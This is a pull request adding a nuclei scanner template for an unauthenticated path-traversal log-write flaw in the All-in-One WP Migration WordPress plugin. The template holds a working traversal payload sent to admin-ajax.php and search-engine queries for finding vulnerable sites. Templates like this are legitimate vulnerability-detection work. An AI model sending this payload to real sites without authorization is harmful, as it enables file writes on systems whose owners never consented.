### PR TITLE
Add CVE-2026-12898 All-in-One WP Migration template

### DIFF
--- a/http/cves/2026/CVE-2026-12898.yaml
+++ b/http/cves/2026/CVE-2026-12898.yaml
@@ -1,0 +1,86 @@
+id: CVE-2026-12898
+
+info:
+  name: All-in-One WP Migration and Backup < 7.106 - Unauthenticated Arbitrary-Location Log File Write
+  author: iamatownboy
+  severity: medium
+  description: |
+    The All-in-One WP Migration and Backup WordPress plugin before 7.106 does not properly sanitise a user-supplied value before using it to build a file path.
+    This makes it possible for unauthenticated attackers to create or append a log file in arbitrary locations outside the intended storage directory.
+  impact: |
+    Unauthenticated attackers can write log files outside the plugin storage directory, potentially leading to information disclosure or further compromise.
+  remediation: |
+    Update All-in-One WP Migration and Backup to version 7.106 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-12898
+    - https://wpscan.com/vulnerability/c90553e4-8e1a-4c99-a28f-a0de8d635caa/
+    - https://wordpress.org/plugins/all-in-one-wp-migration/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
+    cvss-score: 6.5
+    cve-id: CVE-2026-12898
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: servmask
+    product: all-in-one-wp-migration
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/all-in-one-wp-migration/"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,all-in-one-wp-migration,path-traversal,log-write,unauth,vkev
+
+variables:
+  logname: "{{rand_text_alpha(8)}}"
+  padding: "{{repeat('p=1&', 5200)}}"
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "All-in-One WP Migration")
+          - compare_versions(version, "< 7.106")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        action=ai1wm_export&secret_key=invalidkey&storage=/../../../../uploads/{{logname}}&{{padding}}end=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/uploads/{{logname}}.log"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains_any(body, "Input variables exceeded", "PHP Request Startup")
+        condition: and
+# digest: 4a0a00473045022100be4f04d7f5d9a20ec8b53d0c1bf2af68e3b01e117b0cb1af66739b49a12d2f4f022032a0cf6a7a2f4a5e3f7cce97e7e4af4b98f0c6e7af0d1f5dd6486f9a01c11a3a:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-12898.yaml
+++ b/http/cves/2026/CVE-2026-12898.yaml
@@ -1,20 +1,19 @@
 id: CVE-2026-12898
 
 info:
-  name: All-in-One WP Migration and Backup < 7.106 - Unauthenticated Arbitrary-Location Log File Write
+  name: All-in-One WP Migration and Backup < 7.106 - Arbitrary Log File Write
   author: iamatownboy
   severity: medium
   description: |
-    The All-in-One WP Migration and Backup WordPress plugin before 7.106 does not properly sanitise a user-supplied value before using it to build a file path.
-    This makes it possible for unauthenticated attackers to create or append a log file in arbitrary locations outside the intended storage directory.
+    The All-in-One WP Migration and Backup WordPress plugin before 7.106 does not properly sanitise a user-supplied value before using it to build a file path. This makes it possible for unauthenticated attackers to create or append a log file in arbitrary locations outside the intended storage directory.
   impact: |
     Unauthenticated attackers can write log files outside the plugin storage directory, potentially leading to information disclosure or further compromise.
   remediation: |
     Update All-in-One WP Migration and Backup to version 7.106 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-12898
     - https://wpscan.com/vulnerability/c90553e4-8e1a-4c99-a28f-a0de8d635caa/
     - https://wordpress.org/plugins/all-in-one-wp-migration/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-12898
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
     cvss-score: 6.5
@@ -26,8 +25,10 @@ info:
     vendor: servmask
     product: all-in-one-wp-migration
     framework: wordpress
+    shodan-query: html:"/wp-content/plugins/all-in-one-wp-migration/"
+    fofa-query: body="/wp-content/plugins/all-in-one-wp-migration/"
     publicwww-query: "/wp-content/plugins/all-in-one-wp-migration/"
-  tags: cve,cve2026,wordpress,wp,wp-plugin,all-in-one-wp-migration,path-traversal,log-write,unauth,vkev
+  tags: cve,cve2026,wordpress,wp,wp-plugin,all-in-one-wp-migration,traversal,log-write,vkev
 
 variables:
   logname: "{{rand_text_alpha(8)}}"
@@ -62,8 +63,6 @@ http:
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        Origin: {{BaseURL}}
-        Referer: {{BaseURL}}/
 
         action=ai1wm_export&secret_key=invalidkey&storage=/../../../../uploads/{{logname}}&{{padding}}end=1
 


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2026-12898 affecting the All-in-One WP Migration and Backup WordPress plugin.

The issue allows unauthenticated attackers to trigger arbitrary log file writes through the export flow by supplying a manipulated storage path in vulnerable installations.

References:
- NVD
- WPScan
- WordPress plugin source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only